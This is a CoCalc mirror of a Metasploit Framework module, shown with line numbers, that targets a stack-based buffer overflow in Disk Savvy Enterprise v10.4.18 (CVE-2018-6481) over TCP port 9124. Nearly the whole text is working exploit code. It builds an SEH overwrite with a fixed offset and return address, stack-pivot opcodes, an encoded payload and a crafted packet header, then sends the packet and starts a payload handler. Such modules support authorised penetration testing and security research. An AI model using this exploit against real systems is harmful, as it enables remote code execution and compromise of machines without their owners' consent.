Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Disk Savvy Enterprise v10.4.18',

17
        'Description' => %q{

18
          This module exploits a stack-based buffer overflow vulnerability

19
          in Disk Savvy Enterprise v10.4.18, caused by improper bounds

20
          checking of the request sent to the built-in server. This module

21
          has been tested successfully on Windows 7 SP1 x86.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'Daniel Teixeira'

26
        ],

27
        'DefaultOptions' => {

28
          'EXITFUNC' => 'thread'

29
        },

30
        'Platform' => 'win',

31
        'Payload' => {

32
          'BadChars' => "\x00\x02\x0a\x0d\xf8",

33
          'Space' => 800

34
        },

35
        'Referencess' => [

36
          [ 'CVE', '2018-6481' ]

37
        ],

38
        'Targets' => [

39
          [

40
            'Disk Savvy Enterprise v10.4.18',

41
            {

42
              'Offset' => 124,

43
              'Ret' => 0x10056d13

44
            }

45
          ]

46
        ],

47
        'Privileged' => true,

48
        'DisclosureDate' => '2017-01-31',

49
        'DefaultTarget' => 0,

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options([Opt::RPORT(9124)])

59
  end

60


61
  def exploit

62
    seh = generate_seh_record(target.ret)

63
    connect

64


65
    buffer = make_nops(target['Offset'])

66
    buffer << seh

67
    buffer << "\x83\xc4\x7f" * 13   # ADD esp,7fh

68
    buffer << "\x83\xc4\x21"        # ADD esp,21h

69
    buffer << "\xff\xe4"            # JMP esp

70
    buffer << payload.encoded

71
    buffer << Rex::Text.rand_text_alphanumeric(1)

72


73
    header = "\x75\x19\xba\xab"

74
    header << "\x03\x00\x00\x00"

75
    header << "\x00\x40\x00\x00"

76
    header << [buffer.length].pack("V")

77
    header << [buffer.length].pack("V")

78
    header << [buffer[-1].ord].pack("V")

79
    packet = header

80
    packet << buffer

81


82
    sock.put(packet)

83
    handler

84
  end

85
end

86


87